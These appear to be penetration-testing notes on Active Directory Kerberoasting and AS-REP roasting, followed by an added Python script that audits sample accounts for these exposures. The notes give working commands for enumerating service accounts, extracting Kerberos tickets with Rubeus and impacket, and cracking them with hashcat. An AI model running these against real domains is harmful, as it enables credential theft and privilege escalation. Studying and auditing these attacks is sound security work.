Relationships and Attack paths

We can use BloodHound to find hidden relationships and attack paths in an Active Directory environment.

From the collected data we can escalate our privileges toward the target, or use tools like aclpwn.

Kerberoasting

The AD PowerShell module can be used to search for users with an SPN set.

Using Nmap:

nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'

Using Rubeus to gain hashes:

Rubeus.exe kerberoast /outfile:hashes.txt

Use hashcat mode 13100 (Kerberos 5 TGS-REP etype 23) to crack:

hashcat -a 0 -m 13100 SPN.hash /wordlists/rockyou.txt

Using impacket:

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

https://newerasec.com/kerberoasting/

AS-REP

Find users that do not require Kerberos pre-authentication (the DONT_REQ_PREAUTH flag, 4194304 = 0x400000) using the AD PowerShell module:

Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
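As an added example (not part of the original notes), the same two checks the notes run with Get-ADUser and GetUserSPNs.py, written in Python as an audit over constructed account records shaped like LDAP attributes, so the exposed accounts can be remediated (re-enable pre-auth, move services to gMSA or long random passwords). The record layout and account names are assumptions for the example.

```python
# Added example, not from the original notes: decode userAccountControl bits and
# flag accounts exposed to Kerberoasting / AS-REP roasting.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",   # 4194304, the bit in the Get-ADUser filter above
}
MACHINE_BITS = 0x1000 | 0x2000

# Constructed sample records (not real accounts); "servicePrincipalName" is multi-valued in LDAP.
ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/db01.test:1433"]},
    {"sAMAccountName": "legacy.app", "userAccountControl": 0x400200, "servicePrincipalName": []},
    {"sAMAccountName": "old.svc", "userAccountControl": 0x400202,       # disabled account
     "servicePrincipalName": ["HTTP/web01.test"]},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000, "servicePrincipalName": ["HOST/WS01"]},
    {"sAMAccountName": "alice", "userAccountControl": 0x200, "servicePrincipalName": []},
]

def decode_uac(uac):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if uac & bit]

def is_enabled(acct):
    return not acct["userAccountControl"] & 0x0002

def kerberoastable(acct):
    """Enabled user (not machine) account with an SPN: its TGS is encrypted with the account's password hash."""
    uac = acct["userAccountControl"]
    return is_enabled(acct) and not (uac & MACHINE_BITS) and bool(acct["servicePrincipalName"])

def asrep_roastable(acct):
    """Enabled account with DONT_REQ_PREAUTH: an AS-REP can be requested without knowing the password."""
    return is_enabled(acct) and bool(acct["userAccountControl"] & 0x400000)

def audit(accounts):
    """Map sAMAccountName -> list of exposures; accounts with no exposure are omitted."""
    findings = {}
    for acct in accounts:
        issues = []
        if kerberoastable(acct):
            issues.append("SPN on user account (Kerberoast exposure)")
        if asrep_roastable(acct):
            issues.append("DONT_REQ_PREAUTH set (AS-REP roast exposure)")
        if issues:
            findings[acct["sAMAccountName"]] = issues
    return findings

if __name__ == "__main__":
    for name, issues in audit(ACCOUNTS).items():
        print(name, "->", "; ".join(issues))
```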